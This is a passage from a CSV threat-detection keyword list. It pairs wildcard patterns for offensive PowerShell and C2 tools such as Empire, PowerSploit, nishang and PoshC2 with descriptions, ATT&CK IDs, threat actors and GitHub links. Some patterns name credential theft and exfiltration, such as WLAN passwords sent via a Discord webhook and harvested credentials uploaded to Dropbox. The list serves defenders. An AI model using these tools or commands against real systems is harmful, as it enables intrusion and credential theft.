- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-ProcessHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*invoke-processhunter*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" +"*Invoke-ProcessScan*","offensive_tool_keyword","Invoke-ProcessScan","This script uses a list from the Equation Group leak from the shadow brokers to provide context to executeables that are running on a system.","T1059.001 - T1016 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/vysecurity/Invoke-ProcessScan","1","1","N/A","N/A","1","42","22","2017-06-05T12:19:25Z","2017-06-03T18:36:30Z" +"*InvokePS1.bat*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Invoke-ps2exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*Invoke-PSAmsiScan*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Invoke-PsExec*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PSexec.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-PsExec.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1095","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-psexecpayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-PsGcat*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PsGcatAgent*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PSImage*","offensive_tool_keyword","Invoke-PSImage","Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to executenInvoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.","T1027 - T1218 - T1216 - T1059","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/peewpw/Invoke-PSImage","1","0","N/A","N/A","10","2075","401","2019-09-23T15:17:03Z","2017-12-17T18:41:44Z" +"*Invoke-PSInject*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PSInject.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1085","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PSInject.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Invoke-PsUACme*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Invoke-PsUACme*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PsUACme*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-Pwds.ps1*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*Invoke-RBDC*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-RBDC-over-DAVRPC*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-RDPwrap.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ReflectivePEInjection.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1107","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1083","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1137","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ReflectivePEInjection*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Invoke-ReflectivePEInjection.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Invoke-ReflectivePEInjection.ps1*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*Invoke-RefreshToMSGraphToken -domain -ClientId *","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Invoke-Reg1c1de*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-RegistryAlwaysInstallElevatedCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-RegistryAlwaysInstallElevatedCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile * -Headers *","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*Invoke-ReverseSocksProxy*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" +"*invokereverttoself*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Invoke-RevertToSelf*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for 